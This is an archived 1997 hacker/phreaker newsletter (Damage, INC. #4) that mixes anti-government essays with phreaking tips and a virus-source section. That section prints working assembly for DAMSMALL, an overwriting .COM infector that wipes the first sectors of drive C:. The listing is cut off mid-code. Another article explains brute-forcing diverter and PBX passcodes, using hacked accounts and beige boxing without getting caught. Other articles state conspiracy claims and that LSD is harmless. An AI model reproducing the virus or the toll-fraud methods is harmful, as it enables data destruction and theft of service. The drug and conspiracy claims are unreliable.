💾 Archived View for gemini.spam.works › mirrors › textfiles › groups › DAMAGEINC › damage.004 captured on 2023-01-29 at 15:01:02.
⬅️ Previous capture (2020-11-01)
-=-=-=-=-=-=-
??????? ?????? ????????? ?????? ??????? ??????? ???????????????? ??????? ??????? ??????? ????????? ??????? ???? ????? ??????????? ????????????? ??????? ??????????????????????????????????????????????????????? ?? ??? ????? ????????????? ?????? ?????????? ??????????????????? ????????? ????????????? "The name speaks for itself!" ?? Presents the Damage, INC. Newsletter December 1997 Issue #4. "We're gonna phreak you out." ??????????????????????????????????????????????????????????????????????????????? C O N T E N T S : ? INTRODUCTION - An Introduction to the Damage, INC. Newsletter. ? BIG BROTHER BASHING - Statistics Canada and CSIS are listening and watching. ? Search String: {BIG BROTHER} ? BLACKENED'S TIP OF THE MONTH - Virus detection techniques. ? Search String: {BLACKENED} ? CONSPIRACIES AND COVERUPS - Bill C-17: Kiss your rights goodbye. ? Search String: {COVERUPS} ? CORRUPTION AND GREED - Bell preys upon naive customers. ? Search String: {GREED} ? H/P INFORMATION AND NEWS - Information on ANIs and diverters. ? Search String: {NEWS} ? INTERVIEWS AND INTERROGATIONS - Savage Dragon's hilarious message. ? Search String: {INTERVIEWS} ? LETTERS TO THE EDITOR - More feedback about the Damage, INC. Newsletter. ? Search String: {LETTERS} ? OBJECTIVE OPINIONS - Timothy Leary and Drugs. ? Search String: {OPINIONS} ? REPORTS FROM THE FRONT - Cybernauts sing the praises of Bulletin Boards. ? Search String: {REPORTS} ? SOURCE AND SCRIPTS - DAMSMALL virus source code. ? Search String: {SOURCE} ? THE JOURNALIST'S TOP TEN LIST - Not Available in this issue. ? Search String: {TOP TEN} ? THOUGHTS, POEMS AND CREATIVE WRITING - A short poem titled "Awakening". ? Search String: {WRITING} ? CLOSING COMMENTS - BLACKENED's Hostile Closing Comments. ? Search String: {CLOSING} ??????????????????????????????????????????????????????????????????????????????? INTRODUCTION: Phreaking Bell...Phreaking Bell...Phreaking all the way. Oh what fun it is to phreak to a new exchange. Hey. That should get you in the spirit. ;) A special shout goes out to our readers in B.C. We should have a Damage, INC. Dist. Site in your area soon. To the rest of our loyal readers in 519 etc. we haven't forgotten about you. Keep reading, learning and experimenting. Also, I realize there are quite a few newbies that are now reading the Damage, INC. Newsletter. We aren't going to neglect you, so don't worry. To those that do not enjoy reading what we write: phreak you. BIG BROTHER BASHING - {BIG BROTHER} Statistics Canada and CSIS are listening and watching: Statistics Canada (commonly referred to as Stats Canada) and CSIS (which stands for Canadian Security Intelligence Service) are listening and watching. I'm sure that if CSIS gets a copy of this article, I will be under their surveillance. That is, if I'm not already being monitored by them. The main purpose for writing about these two government agencies is to reveal what they've done, show the power and control they've been given, and expose the truth about how they work. Stats Canada is a very corrupt agency. It is an organization of people that is designed to gather information on the citizens of this country. Have you ever received a government survey in the mail addressed to you? If not, then perhaps you've answered their questions over the phone or in person. At any rate, Stats Canada sends out surveys in the mail. They also call people "at random" and expect you to answer their questions. The reason I put the words at random in quotes is because they actually target certain people and repeatedly call them. In fact, if they call and you refuse to answer any questions, the Stats Canada representative will become rather angry and aggressive. I have personal experience with those bastards and know exactly how they behave. First, they said the "survey" was mandatory. I told them that I wasn't going to answer any of their questions over the phone... and politely stated I don't give personal information out to absolute strangers. Then, they replied that they can setup an appointment and ask the questions in person. I said I wasn't interested in filling out anything or answering any questions. That's when they snapped. The voice of the Stats Canada representative became emotional and upset... and she said that I must answer her questions. At that point, I was basically sick of talking to them. However, I decided to ask what they'd do if I refused to answer any questions. She then threatened to imprison me and said that I'm obligated by law to do what they ask. Hahaha. I couldn't contain myself and began laughing. Then I just made up an excuse about being unavailable. Before I hung up the phone, she made another threat about calling back until I complete the survey. That's just one example of how Stats Canada treats (or threatens) average citizens. Why does Stats Canada even exist? The sickening truth is that they exist to gather information on us. They even target people and victimize them by continually forcing them to answer questions, fill out surveys etc. It should be our right not to give out personal information. We should have the option to refuse answering their questions. Also, the information and data that they gather isn't kept confidential... even though they claim it is. Stats Canada has been caught *selling* people's information to private companies that create databases. Obviously, that's an illegal act on their part. They intentionally violate people's privacy in order to profit. It was reported a few months ago that Stats Canada was harassing people in B.C. At least they didn't just take it and are trying to fight them. On a side note, Stats Canada also enjoys falsifying and manipulating the statistics that they report. As in, the percentage of people that are unemployed, inflation, savings, the deficit etc. You simply cannot trust any figures that they create. CSIS is no better though. In many respects, they are even worse than Statistics Canada. The Canadian Security Intelligence Service (CSIS) is extremely corrupt and untrustworthy. Several months ago, they were caught using illegal phone taps on innocent citizen's phone lines. They use unlawful methods to gain access to personal information. CSIS is also fond of installing bugs inside of residences, without just cause or suspicion. They don't just break and disobey the laws, they flaunt it by abusing their power on a regular basis. It would be almost impossible to know if they are watching and listening... If that isn't Big Brother in action, then the term "Big Brother" is meaningless. I was very surprised that the RCMP would reveal the actions of CSIS and expose them, since those two organizations usually work closely together. Perhaps there's a much larger conspiracy at work. CSIS is a dangerous, secret agency. In my opinion, their sole purpose is to keep an eye on the "dissidents" of this country. They don't seem to be very effective at spying and doing intelligence operations in foreign countries, thus they concentrate their efforts on us instead. CSIS infiltrated a group named the Heritage Front, which is a "white supremacist" organization. In the end, the undercover CSIS agent ascended through the ranks and was a leader that spoke at meetings. Instead of just gaining information on the Heritage Front, he actually helped them grow, become stronger, raise funds and awareness of the group. Haha. That's a perfect example of how CSIS attempts to closely watch an internal group of individuals, and it backfires when they benefit the group that they've targeted. There was even a documentary on TV about the entire ordeal. I must admit, it was hilarious to see a Heritage Front member thanking CSIS for helping them and saying that they did absolutely no harm. Meanwhile, we pay millions of tax dollars to fund CSIS. Why? Well, the only answer is so that they can fuck up like in that case and waste our money. Or, so that CSIS can bug the houses of every citizen that they deem to be "suspicious". If you are affiliated with a group that's anti-government, you are instantly on their hit list. That is, no evidence is required for them to take actions against you. Is that democracy? I think not. CSIS is comparable to the CIA in many ways. The only major differences are that they aren't as organized, established or powerful. The CIA has tremendous resources and their power is far reaching (the entire world), whereas CSIS mainly spies on the people within Canada's own borders. That is why they are the epitome of Big Brother. Time and time again they've demonstrated their willingness to flagrantly violate the laws, rights and invade the privacy of Canadian citizens. That's the reason they should be eliminated before their control becomes stronger. The only plausible way to do that is by fighting fire with fire. In other words, their corrupt and sickening ways can be used against them. I will continue to get information on CSIS and write articles in order to expose the truth. CSIS actually stands for Cancer Spreading In Secrecy. The key to destroying them is information. Instead of fearing CSIS, fight them by being prepared and by possessing the knowledge of how they think and act. Kill the cancer. Written by BLACKENED ? Damage, INC. (C)opyright 1997. BLACKENED'S TIP OF THE MONTH - {BLACKENED} Virus detection techniques: There are many people that are paranoid about viruses these days. Therefore, they scan their computer systems regularly with virus scanners such as F-PROT, McAfee's Scan, TBAV, Norton Anti-Virus etc. in an attempt to feel safe. The problem with that is, they are only given a false sense of security. Those virus scanners can't detect every virus. Even if you use F-PROT Heuristics Scan, you still won't be able to find everything. However, you might encounter some false alarms as it wrongly detects files that aren't infected at all. F-PROT's secure scan will only detect viruses that were sent to Data Fellows to be analyzed. They disassemble it and create a scan string. Then, the new version of F-PROT that they release looks for that code in files. It's a rather simple method and quite primitive in a way. If you want to continue scanning your hard drives, or new files that you download... that's fine. I'm not trying to tell anyone not to do that. In my opinion, that isn't the safest or most reliable way to detect viruses. The best method is to use another computer system for virus testing. Using an old 286 system with a hard drive is perfect for that task. Then you can do whatever testing you want, without worrying about files being infected etc. Obviously, not everyone has more than one computer available to them. That's the reason I decided to write about virus detection techniques for those that only have a single computer. First, you need to get a copy of HideDrive by Damage, INC. Read the docs carefully before you attempt to use it. Basically, HideDrive is a utility that's designed to hide and unhide hard drives. The virus detection technique isn't difficult to use. Simply copy the suspicious file (or a known virus) to a floppy disk, as well as several COM and EXE files. Then use HideDrive to hide every hard drive on the system. Change from drive C: to A:. To check and make sure that the drives were properly hidden, try changing to them by typing C:. If the DOS error message "Invalid Drive Specification" is reported, that means drive C: is hidden. Now execute the suspicious or infected file on the floppy. The other COM and EXE files on the disk will be used for testing purposes. If their file size, date or time changes after you try executing the suspicious file...that means they've been infected by a virus. The virus might go memory resident, so remove the disk and press your Reset button to be safe. You can then view the files with a hex editor to check and see if they were overwritten or if code was appended by the virus. Simply compare the files with the hex of the actual virus. You can comment out the nuke procedure, assemble the DAMSMALL virus and safely use it with the above method for testing. Once you have more experience using HideDrive, you can test more complex viruses that go memory resident, use stealth routines etc. They won't be able to do normal writes to files that are on your hard drives (as long as they've been properly hidden first). ;) As an example, if a virus attempted to infect COMMAND.COM (although most don't do that for obvious reasons)... you'd probably see a DOS error message that says "Invalid drive specification" since drive C: was hidden. That is, the virus wouldn't be able to write to C:\COMMAND.COM. It can't infect a file that it can't find and write to. ;) Just be careful using this method though. HideDrive won't protect your hard drives from trojans that use BIOS writes etc. That's the reason this method is only recommended for use with viruses. If you have any questions, contact us. Written by BLACKENED ? Damage, INC. (C)opyright 1997. CONSPIRACIES AND COVERUPS - {COVERUPS} Bill C-17: Kiss your rights goodbye. Disclaimer: The sections of Bill C-17 (35th Parliament session) listed below comes from the Government of Canada web site. If there is any misinformation, they are responsible for it. It took me hours to find confirmation that Bill C-17 received royal assent, and was enforced by the Department of "Justice" of Canada. The Government intentionally makes it difficult to learn about laws. "Ignorance of the law" is their greatest weapon. On April 25, 1997, Bill C-17 received royal assent from the government. Its purpose is to amend the Criminal Code, as well as some other acts. Some of the notable sections are: Immunity to criminal prosecution if a police officer commits a crime while undercover (too many exemptions to list); making occupancy in a stolen vehicle a criminal offence (section 15); and punishing those that think they committed a criminal act, even if they didn't (section 28). In this article, it is my intent to show you portions of Bill C-17 relating to police searches and seizures. These revisions to the Criminal Code formally create loopholes for police officers. I will start by showing you section 46: 46. The Act is amended by adding the following after section 487.1: Where warrant not 487.11 A peace officer, or a public officer who has necessary been appointed or designated to administer or enforce any federal or provincial law and whose duties include the enforcement of this or any other Act of Parliament, may, in the course of his or her duties, exercise any of the powers described in subsection 487(1) or 492.1(1) without a warrant if the conditions for obtaining a warrant exist but by reason of exigent circumstances it would be impracticable to obtain a warrant. Basically, this gives a police officer an excuse if he decides to search your premises without a warrant. Who determines the "exigent circumstances?" The police officer of course. Let's look at section 41, which may be of interest to hackers and phreaks. Section 41 deals with search and seizure of computer data. 41. Section 487 of the Act is amended by adding the following after subsection (2): Operation of (2.1) A person authorized under this section to search computer system a computer system in a building or place for data may and copying equipment (a) use or cause to be used any computer system at the building or place to search any data contained in or available to the computer system; Section 2.1(a) is particularly disturbing. What is considered "available to the computer system?" Can a cop use the computer system with a modem and phone line to search other computer systems "available to" it? The vagueness of 2.1(a) opens up a multitude of loopholes for the investigator. (b) reproduce or cause to be reproduced any data in the form of a print-out or other intelligible output; (c) seize the print-out or other output for examination or copying; and (d) use or cause to be used any copying equipment at the place to make copies of the data. These subsections add insult to injury. The cop can seize a blank floppy under (d) and use it to satisfy (b). Any computer hardware you own *will* be used against you. Duty of person in (2.2) Every person who is in possession or control of possession or any building or place in respect of which a search is control carried out under this section shall, on presentation of the warrant, permit the person carrying out the search (a) to use or cause to be used any computer system at the building or place in order to search any data contained in or available to the computer system for data that the person is authorized by this section to search for; My own perception of this subsection is that the person being searched is supposed to act as an assistant to the cop. Look at the words "cause to be used." What is the scope of that? Must the person being searched provide passwords and encryption keys in order to satisfy 2.2(a)? If so, the person being searched either incriminates himself, or is charged with obstructing the cop's search. (b) to obtain a hard copy of the data and to seize it; and (c) to use or cause to be used any copying equipment at the place to make copies of the data. 22(b) and (c) reinforce 21(b), (c) and (d). The person being searched is supposed to allow (assist) the cop in obtaining copies of the data. It would be to the advantage of the cops and crown prosecutors if the suspect is forced to provide complete access to the data on his system. Once they obtain access to any incriminating (or allegedly incriminating) data, they can seize every electronic device "in or available to" the data. Under section 48(2) (entitled Seizure without warrant) of Bill C-17, it is possible for a police officer to seize anything that he believes was used to perform a criminal act. If the cop doesn't want to do that, he can pick up your phone, call up a judge and get a "telewarrant" (sections 42(7) and 44(3)) for anything else he wants to search for or seize. I could go on for many more pages talking about other sections that deal with search and seizure. However, the small amount of text that I imported from Bill C-17 should be enough for you to realize that section 8 of the Charter of Rights and Freedoms ("the right to be secure against unreasonable search and seizure") is a fucking joke. Bill C-17 is nothing more than a huge government conspiracy to make any person living in Canada vulnerable to (literally) unwarranted police invasion. With extended powers and criminal immunity, the police can arrest anyone for anything. The government seeks total control over the population, and the threat of imprisonment, and financial ruin due to legal fees, does keep some people under their thumb. The way I see it, they are trying to coverup the fact that they are taking active steps to create the Canadian Thought Police. Don't assume that you have certain rights and freedoms, because as each bill is passed they are being raped from us. Assuming anything is a mistake in itself. Written by Shatazar ? Damage, INC. (C)opyright 1997. CORRUPTION AND GREED - {GREED} Bell preys on naive customers. Bell is a well known, fat cat company that enjoys a monopoly of telephone service in Canada. Since they've never had to compete in an open marketplace, they rely on their monopoly in order to finance their greedy corporate culture. Bell is known for their total lack of respect for their customers. They know that there is no where else for people to go for local telephone service. At one time, Bell had a monopoly on the telephone itself. The only "legal" telephones were the ones that were rented directly from Bell. This policy was enforced for decades. Then Bell was forced to soften the policy. Bell required that one telephone must be rented from them, but extension telephones could be purchased. That is over now. Bell can't force us to rent one of their shitty, overpriced telephones anymore. Bell still makes a tremendous amount of money from naive customers that continue to rent telephones. Why do these people choose to rent a telephone from Bell? Unlike major household items, a telephone is a relatively inexpensive machine. Telephones are also fairly uncomplex, so they can be used for decades without having any kind of a breakdown. I personally fail to see why anyone should rent a telephone. Unless the intent of telephone renters is to feed Bell's greed by joyfully putting money into their pocket. :-( Bell's primary residential phone renters can generally be put into two groups. The first groups are young yuppies that rent the "top of the line" telephone with all the little Bell buttons. They "need the best" to compete with their snobby neighbours. Since they may not be able to afford one that costs $250 or more, they rent it. These morons also believe that blowing money on all of Bell's services (Call Screening, Caller-ID, etc.) is a necessity. If these people would have a little bit of self-control, they would save up enough money to buy the phone outright. I do have some sympathy for the second group of Bell telephone renters; the elderly. They are from the era of the Bell "rental monopoly" and many haven't realized that they can return Bell's phone and own their own. Most seniors are trusting people, so they don't tend to look at their telephone bill carefully. They don't realize how much money they have allowed Bell to take from them. Of course, Bell is careful to let seniors think that their corrupt telephone policies are still in effect. To this day, Bell service operators still ask "Do you have a Bell phone?" However, I have found it isn't a total waste of time to inform seniors how they are being gauged by Bell. My grandmother rented a Harmony touch tone telephone from Bell for 13 years. Bell charged her $3.55 per month, plus 15% taxes. That works out to be $48.99 per year. (Try multiplying $48.99 by the millions of people that rent phones from "Ma Bell" :-(). A refurbished Harmony phone costs $14.99 ($17.29 with taxes) at a discount department store. A new Harmony phone doesn't cost much more than $25. Here is the real kicker. Performing simple math, 13 * $48.99 equals $636.87. That doesn't even count the years she rented one of those ancient, black rotary phones that sit in many bedrooms, basements, attics and barns throughout Canada. When I found out that she was renting, I helped her by doing the above calculations. And she understood them. She paid for 40 refurbished Harmony phones over the past 13 years. She decided that she wanted to stop the eternal bleeding that Bell was causing. We returned the Harmony phone to Bell, and she bought a new telephone with large buttons, which will pay for itself in two years. I recommend that you do the same thing for the naive. Ask you parents, your grandparents, and everybody else you have respect for if they rent a phone from Bell. Help them out with some simple mathematics. Let them know how many telephones they could have bought with the money they gave to Bell. Hopefully, they will no longer want to be a part of the rental scam that Bell has been profiting from since their corrupt beginnings. Either that or you can take matters into your own hands. Since Christmas is near, you could cross one gift off of your list by buying them a telephone. You'll also be eliminating a little bit from Bell's income statement. 'Tis always the season to fight back against Bell! ;-) Written by Shatazar ? Damage, INC. (C)opyright 1997. H/P INFORMATION AND NEWS - {NEWS} Information on ANIs and diverters: This section was written and intended for newbies that have little or no phreaking experience. First, I'd like to clear up some misconceptions. I've been asked questions such as "Does *67 cost anything?" many times by users on boards in 519. *67 is free. Also, I've seen people ask "Does *67 block out the phone number if the other person uses *69 after you hang up?" Yes, your number won't be reported to them. "Does *67 get around call screening?" No, it doesn't. If the person uses call screening to prevent you from calling them from a certain number, you need to use a diverter. ;) Maybe a complete list of Bell *## codes and what they do is necessary. ANIs/ANACs and diverters are two things that novice phreaks should definitely learn and know about. They are both very important and useful for several reasons. ANACs (Automatic Number Announcement Circuits) can be local or 1-800 numbers etc. As an example, you dial the number 1-800-555-5555 and it reports what your number is. Obviously, it's useful for finding out the number while you're beige boxing...but also for finding out if an extender diverts. If you have an extender and want to find out if it's also a diverter, simply use it to call an ANI. Not all extenders divert though. Plus, there are occasions when you need a local diverter that isn't an extender. For example, if you wanted to call a local ISP and divert your number. To find diverters, use ToneLoc to scan for them. You'll probably find a diverter or two, some extenders, PBXs etc. Usually, there's a 4 or 5 digit passcode on them which can be hacked quickly. If the passcode is more than 6 digits, try hacking another one as it will require too many attempts. At this point, you might be asking "What do I need a diverter for anyways?" If you plan on dialing out through a PBX or using an extender for free ld, you should consider using an extender. Another instance would be hacking an ISP or using hacked accounts. Diverters are also useful for calling numbers that have Caller ID, Call Screening or an ANI. Many PBXs, 1-800 extenders, systems etc. have ANIs...so use diverters to avoid being busted. You can also use extenders that divert (check to make sure they do first) to access an ISP through the local number they have in that area. Most ISPs have numbers that are local to different areas, so using extenders that divert is a fairly good method to use. Using several diverters is even better and more difficult to trace. Don't assume that the number you're calling doesn't have an ANI unless you want to get busted. Once you have some diverters, you can use them with ToneLoc to scan etc. safely. The possible uses for them are almost endless. ANIs can also be used with CNAs. "What the fuck is a CNA?" CNA stands for Customer Name and Address. If you're beige boxing and used an ANI to get the phone number (or you just want to find out the Name and Address of a telephone number) you can use a CNA to get that information. There are local and ld CNAs as well as 1-900 (pay per minute) CNAs that some private companies provide as a service. Most of them are setup by the local telco for use by linesmen etc. They use an ANI to find the number for a line (which is just a pair of wires), and then they dial the CNA number to find out their Name and Address. Telco personnel use them and phreaks do as well. They're quite useful in any situation when you require that information. As in, you can setup a teleconference while you are beige boxing by using an ANI and a CNA. ;) In the next issue of the Damage, INC. Newsletter there will be more information on PBXs, VMBs etc. I'll discuss what they do, how to find them, hack them and use them without getting caught. Until then, start reading phreaking related text files, experiment with ToneLoc and any codes that you find. Written by Blackie Lawless ? Damage, INC. (C)opyright 1997. INTERVIEWS AND INTERROGATIONS - {INTERVIEWS} Savage Dragon's hilarious message: I simply couldn't resist including a copy of this message in the Damage, INC. Newsletter. It was posted in a public base on FoI Archives. My intention isn't to humiliate him. I'm not trying to be malicious in any way. I just found it hilarious. Basically, I decided to publish it instead of doing an interview or interrogation in this issue. Just remember, anything that you post on a board can be captured/imaged and used by anyone else for their own purpose. In this case, we just took a message and published it so that our readers in other area codes (outside of 519) can have a good laugh. ;) ------------------------------------------------------------------------------- There I was .. a clueless newbie with an internet account from daddy. I got into the irc business, all the good stuff. Then I learned about shells. I found out I had one, and learned how to access it (tough stuff). So, I ftp'd to to it using good old cuteftp, and started looking around at not only the shit in my directory, the shit in other directories. There I noticed there was a big names list of all the poeple's login names. I was in business. Big time. After I wrote down about 30 names from the list, I loaded up good old telnet.exe and telnet'ed to my isp, trying every username i wrote down, as for the password, i just used the username too. :P As I was chatting on irc, no doubt everyone was laughing at my incredible 'hax0ring' skills, they told me to try the login name "root". I tried that for about 10 logins, and then poof, i was disconnected. I went to reconnect, and every time it wouldn't work. So i called them up and told them something was wrong with my account, and I couldn't login. In response, they told me "ya, we locked you out". I chatted with them for a while, then left still wondering how they traced me. :) I was on my sentex accoutn, telnetting to sentex. Smart. :P Uh. I'm getting sick of this shit .. savage dragon ------------------------------------------------------------------------------- LETTERS TO THE EDITOR - {LETTERS} I received these messages on FoI and Distraught Continuum. If you have any feedback, leave BLACKENED Email or Netmail. Date: 2:32 pm Thu Nov 27, 1997 Number : 746 of 749 From: Sprite Base : [Damage, INC. Discussion] To : Blackened Refer #: None Subj: Damage, INC Newletter #3 Replies: None Stat: Normal Origin : Local I just got done reading the latest newsletter.. When I read your "Interview" with Billy boy... I almost pissed myself laughing.. twice. Your information is always accurate and your 'gut instinct' <-refering to latest interview! Should be applauded.. Well.. I hope you keep it up.. It's looking very promising! l8r .??. `?..?$p?????..?? date: 1:19 pm sat nov 29, 1997 number : 4 of 4 from: Kalamity base : Private Mail to : Blackened refer #: none subj: Hey replies: none stat: normal origin : local Just thought I'd drop a note letting you know that I downloaded all the Damage Inc. newsletters released so far, and that I think they're excellent! One thing I will try is Toneloc. Because, honestly, who likes paying Bell for long distance charges? :) Kalamity ------------------------------------------------------------------------------- Editor - Sprite, we're glad you enjoyed the interrogation of Billy Gates. It was intended to be humorous. Basically, we wanted to humiliate him and give the readers a good laugh at the same time. ;) Thanks for the feedback man. Kalamity, I hope you continue reading the Damage, INC. Newsletter. It is good that you're taking an interest and learning more about ToneLoc etc. Your point about ld charges is well taken. Thanks for the feedback and compliment about our releases. OBJECTIVE OPINIONS - {OPINIONS} Timothy Leary and Drugs: "Turn on, tune in, drop out" "Surfing the chaos" Timothy Leary lead an amazing life. He advocated the use of LSD and other psychedelic drugs... that expand your mind. He was outspoken, and not afraid to break the laws in order to convey his message. He was imprisoned, made a daring escape... fled the United States... and lived in Switzerland until he was captured in Afghanistan and returned to the U.S. He was anti-establishment and believed in personal freedom and thought. Even in death, he managed to capture attention by having his head removed and frozen... to be preserved in a cryogenic state. His body was then cremated and the ashes were dispersed in space. His death was filmed, and I was able to watch as they cut off his head and put it in a clear container filled with ice. His face was positioned towards the camera. I can honestly say, I have never seen anything quite like that before. Of course, it's possible that the decapitation of his head was faked. Real or not, he managed to make everyone that viewed the event think. Leary had many accomplishments that are noteworthy. He toured universities as a speaker. He had a PhD and was also a writer. Over the years, he wrote many books. Some of them were written while he was serving a sentence in a California prison. Leary once said that law enforcement was closely related to agriculture since "police officers are very skilled at planting." to paraphrase him. He was busted for possession of two joints, which a cop put into the ash tray of his car. Given his reputation, it shouldn't be too difficult to picture them framing him. The judge didn't give him bail at his trial because he said his "ideas were dangerous". President Richard Nixon called Timothy Leary "the most dangerous man alive." because of the books he'd written and the speeches he had made. Imagine that. Meanwhile, Leary was just a philosopher with ideas that the government didn't agree with. He was persecuted for his ideas, his words, his lifestyle and his mind. That was the real weapon. Leary's imagination and philosophies weren't "acceptable" to the Government of the United States of America. In their view, he had very dangerous ideas about drugs etc. that they are still trying to battle in their little "war against drugs" until this day. However, they will never win the war on drugs... as long as there are eloquent, aggressive, free thinkers like Leary around to speak out. Don't conform. Become Informed. Don't just believe everything like a zombie. Instead of listening to propaganda that is intended to brainwash you, educate yourselves. LSD won't harm you. The THC that's in marijuana doesn't permanently alter your brain. ;) The anti-drug campaign is orchestrated by unintelligent members of Big Brother. They will tell you that smoking weed makes you stupid. If that's true, how was Leary (a frequent drug user) able to write so many excellent books? Also, why can't they create more imaginative slogans? "Just say No" says nothing at all. They group everything together. Are crack, heroin, cocaine, hash, acid, marijuana etc. all the same? No, of course not. Yet, that's what you are *told* and supposed to believe. Here is my answer to that: Fuck "the establishment". Fuck "the system". Fuck "society". Fuck Big Brother. They lie in order to control the citizens. They expect their words to be taken as truth. They're wrong in assuming that everyone is blind. Leary was a very controversial figure. Big Brother tracked, monitored and feared him because they thought he was a threat to "society". He had strange ideas, different behaviour and ways of doing things. That is, he didn't just go with the grain. In fact, he was infamous for saying things that go directly against the norm. That is why I feel that he was a genius. I'm not basing that statement purely on his intellect either, but rather the way in which he lived his life. He wasn't afraid to be involved in the whole counter-culture movement of that era. Leary was also a cool person that bridged the generation gap and could relate seemlessly with much younger people. He was able to teach them about things that weren't often discussed openly during that time. Leary would say anything that he believed in, and should be commended for doing that. I *know* some of you are enlightened enough to understand the message that is expressed in this short article, and form your own opinions. That's all that I can ask for. Unfortunately, the same can't be said of your own government... as they don't want you to read this and form your own opinions about what is written. My final comment is that I've seen some of Leary's expressions altered and abused for commercialism and capitalism. As in, "Turn on, tune in and win" has been used to advertise contests etc. In my opinion, that is a pathetic example of how a message can become distorted and used for another purpose. The majority of the time, the purpose is to exploit it and make money. Greed is another topic though, so I'll just end this by saying; Think and you will prosper. Written by BLACKENED ? Damage, INC. (C)opyright 1997. REPORTS FROM THE FRONT - {REPORTS} (c) 1997 Mark Stachiew (c) 1997 The Montreal Gazette CYBERNAUTS SING THE PRAISES OF BULLETIN BOARDS by Mark Stachiew Back in the Stone Age of computers, before Bill Gates had made his first million and the Internet had yet to see its first "spam" message, computer users talked with each other via Bulletin Board Systems (BBSes). While the World Wide Web has taken a bite out of the number of BBSes, they never really went away and now the old-timers who still use them are banding together to tell cyberspace newcomers what they're missing. A BBS is basically a computer sitting in someone's home running software which allows it to answer incoming calls. Other computer users call the BBS to exchange messages, play games and download computer programs. It really is an electronic bulletin board. They are usually free to call since the system is being run as a hobby by someone who is donating time and computer. No fancy browsers or hardware are required. The lowliest computer with a modem and terminal program will be enough to connect to a BBS. Longtime users of BBSes remain nostalgic about the early days of the 1980s when the first home computers gave birth to the fledgling bulletin boards. In those days BBS callers used glacially-slow 300 baud modems with acoustic couplers that had to be fit over telephone handsets and looked like rubber earmuffs. They endured these hardships because of the magic that BBSes created. It was a new form of communication which allowed people to make contact with total strangers which sometimes developed into lifelong friendships. Lynda McCormick knows all about BBSes bringing people together. She runs one of the oldest ones in Montreal. McBB has been in continuous operation since 1984 [typo here, actually it was 1987 - we just celebrated our 10th anniversary this month! --Bl.] and people who called on the first day are still calling 13 [10] years later. "Some of the old-time users will still call in long-distance when they've moved away," she says. "Not on a regular basis, but it's fantastic to hear from them and hear how life is treating them now in Toronto, London, Ontario, Seattle, or L.A." McCormick is still enthusiastic about BBSing and is creating an online BBSing Museum with electronic ephemera from BBSes which have long since vanished into the ether. "The BBS scene in Montreal has been a very rich one with many characters, personalities and a few very hilarious stories," she says. "I for one would like to see it preserved and cherished as it should be, and not simply swept away and forgotten." One local BBS operator, Steve Monteith, has maintained a list of Montreal bulletin boards (www.vir.com/~capt_xerox/bbslist.html) for nearly 12 years. Looking over archives of the list demonstrate how much damage the Web has done to BBSing in this city. In 1989, Montreal boasted 175 computer bulletin boards. That number grew steadily, peaking at 482 in 1995 which is about the time the Web began to blossom. Since then the number of BBSes has plummeted to 221. At that rate of decline they could be extinct in two years. So do BBSes have a future? The people who still use them think so. They persist because they create a sense of community among users and because callers usually live in the same town, so they are able to get together offline where friendships are formed. That can be difficult on the Internet where you could be exchanging E-mail with someone from Zimbabwe or Kuala Lampur. Monteith notes a few other advantages of the local BBS over the Internet. You won't get unwanted E-mail (spam) and BBSes are rarely commercial. "You can read through whole message bases, and not see an advertisement and you can be quite sure that your name on a BBS isn't going to be sold to some mailing list." An international grass-roots organization has sprung up to spread the word about BBSes. The Council for Online Community Alternatives (http://coca.home.ml.org) aims to promote BBSes as an alternative to the Internet and to build awareness among computer users that BBSes are available in their communities. They maintain that in recent years millions of people have rushed out to buy computers thinking their only online alternative was the Internet, oblivious to the existence of local BBSes. COCA likes to point out some of the advantages of BBSes. For example, at peak times the busy Internet can slow to a crawl. That isn't a problem on a BBS since there is usually only one user connected at a time so your new fast modem will actually work at full speed. Unlike most discussion groups on the Internet, the ones on BBSes are usually moderated and ill-tempered "flame" wars are less common. And pornography is much rarer on BBSes. BBSes are becoming more sophisticated. Many local BBSes now offer Internet E-mail and access to select Usenet newsgroups. Some have lots of downloadable files while others use flashy terminal programs which give them a graphical interface which is almost as easy to use as a Web browser. Some bulletin boards are even directly accessible over the Web, usually via telnet. You can find a list of other Internet BBSes at http://dkeep.com/sbi.html. Other BBS resources on the Web: BBS FAQ www.sysopworld.com/bbsfaq/text/faqmain.htm DIRECTORY OF NORTH AMERICAN B.B.S.es www.thedirectory.org/areacode.htm B.B.S.es ON THE INTERNET www.digitalis.net/~messer/bbs/ THE WORLD OF B.B.S.ing www-scf.usc.edu/~thuyenqu/bbsing.htm SOURCE AND SCRIPTS - {SOURCE} Virus Name: DAMSMALL Variants: None Status: New Written: December 1997 Symptoms: Infected .COM files, C: is nuked if activated Origin: Canada Length: 90 to 105 bytes (with nuke procedure) Type Code: .COM Infector Detection Method: F-PROT Heuristics Removal Instructions: Delete all infected files. They cannot be cleaned since the start of their code is overwritten. General Comments: The DAMSMALL virus infects .COM files by overwriting them. It alters the date/time stamp of infected files but doesn't increase their size. The infected files simply become a copy of the actual virus (the first 90-105 bytes). The virus will activate the nuke procedure when there aren't any .COM files in the current directory to infect. Upon activation, it will nuke the first 120 sectors of drive C: and then halt the CPU. It's a very small, simple virus. There are no variants of the DAMSMALL virus. I'm releasing the commented source code so that readers can use it as a learning tool. ------------------------------------------------------------------------------- ; [DAMSMALL] virus (105 bytes) ; Written by BLACKENED of Damage, INC. (C)opyright 1997. ; TASM /M DAMSMALL.ASM TLINK /T DAMSMALL.OBJ to assemble. code segment assume ds:code, ss:code, cs:code, es:code org 100h ;All COM files start here virus_length equ finish - start ;Length of the virus start label near damage proc near id db 'DI' ;The virus ID is DI which stands ;for Damage, INC. damage endp main proc near mov ah,4eh ;Find first file function mov cx,00100111b ;CX holds attribute mask mov dx,offset filespec ;DX points to *.COM files findlp: int 21h ;Call DOS to execute function jb nuke ;Nuke if there are no COM files call infect ;Attempt to infect the file. jne exit ;Exit if we were successful. mov ah,4fh ;Find next file function jmp short findlp ;Repeat process exit: mov ax,04C00h ;Terminate program int 21h ;Return to DOS main endp nuke proc near cli ;Prevent all interrupts mov ah,03 ;BIOS write sectors mov al,120 ;Number of sectors to nuke mov ch,00 ;Cylinder mov cl,01 ;Sector number mov dh,00 ;Head number mov dl,80h ;Drive C: int 13h hlt ;Halt CPU nuke endp infect proc near mov ax,3d02h ;DOS Open the file mov dx,80h+1eh ;Moves filename into dx int 21h ;Execute function xchg bx,ax ;Save handle to BX mov ah,3Fh ;DOS Read from file function mov cx,2 ;CX holds 2 bytes to read mov dx,offset holdit ;DX points to holdit buffer int 21h cmp word ptr [holdit],4944h ;Are the two bytes "DI"? pushf ;Save flags je close ;Yes, close the infected file. xor 